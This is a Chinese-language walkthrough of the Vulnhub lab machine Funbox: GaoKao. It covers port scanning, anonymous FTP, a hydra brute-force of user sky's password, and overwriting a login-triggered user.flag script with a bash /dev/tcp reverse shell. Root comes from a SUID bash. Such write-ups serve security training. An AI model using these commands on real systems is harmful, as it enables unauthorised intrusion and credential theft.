Vulnhub 靶机篇:Funbox: GaoKao
## 0x01 靶机信息> - **名称**:Funbox: GaoKao
> - **发布日期**:2021 年 6 月 6 日
> - **作者**:0815R2d2
> - **系列**:Funbox
> - **难度**:简单
> - **简介**:这是一个适合初学者的盒子,但并不容易。集合小心!!! 暗示: 不要浪费你的时间!每个帐户尝试 1500 次后,所有端口上的每次暴力攻击都可以停止。 享受游戏和所见即所得!
> - **下载链接**:https://download.vulnhub.com/funbox/FunboxGaoKao.ova
> - **MD5**:A2A73C821F30F0AFF9D535F057CB126B
> - **网络**:DHCP自动分配
## 0x02 Write-Up
### 2.1 信息收集
#### 2.1.1 主机扫描
目标机IP:192.168.181.169
使用nmap工具
``` txt
nmap -sS -Pn -p- -A -T4 192.168.181.169
-sS 隐蔽扫描,-Pn 禁Ping,-p- 所有端口,-A 综合扫描,-T4 快速扫描
```
发现目标机开启了21,22,80,3306端口;其中扫描发现ftp开启了匿名用户登录
!(https://img-oss.hg021b.org/2024/8/0c8eb09ef0b6208651193b75d919fe99.png)
#### 2.1.2 ftp匿名用户登录
使用anonymous账户登录成功,并且在登录信息中暴露了用户sky
!(https://img-oss.hg021b.org/2024/8/b41e61a40b17734e931cf6971c5e4bd7.png)
信息有限,尝试破解sky用户的密码
### 2.2 渗透路线
#### 2.2.1 使用hydra破解ssh密码
``` bash
hydra -V -l sky -P /usr/share/wordlists/rockyou.txt 192.168.181.169 ftp
-V 详细内容, -l 用户名, -P 密码字典,ftp ftp模式
```
成功破解密码thebest
!(https://img-oss.hg021b.org/2024/8/1fb9912c07369e91c61116fa66e25377.png)
#### 2.2.2 使用lftp登录sky用户
``` bash
lftp sky:thebest@192.168.181.169
用户名:密码@IP
```
成功登录,发现目录下的user.flag文件是可执行文件,内容是bash脚本
!(https://img-oss.hg021b.org/2024/8/c1b249b4cc818d41805c1ade87aae23d.png)
由于内容是主动输出flag,这样一个可执行的flag有理由怀疑是用户登录时触发
#### 2.2.3 反弹shell
``` bash
get user.flag
获取文件
```
!(https://img-oss.hg021b.org/2024/8/9d917ac9d70518181fe0fadb1f4813b7.png)
本地修改
``` bash
bash -i >& /dev/tcp/192.168.181.136/4444 0>&1
```
!(https://img-oss.hg021b.org/2024/8/f96396f9c11f64bc72c6e1edd741a4de.png)
``` bash
put user.flag
使用put上传
```
!(https://img-oss.hg021b.org/2024/8/621dabc38bf263521adec196a2212db4.png)
本地打开监听端口
``` bash
nc -lvvp 4444
```
!(https://img-oss.hg021b.org/2024/8/fa51041750c79d99ec02cad8aaba2764.png)
重新登录ftp尝试触发
!(https://img-oss.hg021b.org/2024/8/3e8d150cb3b4bb6e11bd53567a5e793f.png)
反弹成功
!(https://img-oss.hg021b.org/2024/8/de10bba03d5d7bc983b1423bded0bc41.png)
#### 2.2.4 sudo提权
``` bash
find / -perm -u=s -type f 2>/dev/null
查找sudo权限
```
!(https://img-oss.hg021b.org/2024/8/68a6da930ccb768bcfe9a83986d3e830.png)
提权成功
```
/bin/bash -p
来自(https://gtfobins.github.io/gtfobins/bash/)
```
!(https://img-oss.hg021b.org/2024/8/11e37d884e98848af914d96dc77e5052.png)
!(https://img-oss.hg021b.org/2024/8/ee34cb40da48e12b95637fda31e421b1.png)
页:
[1]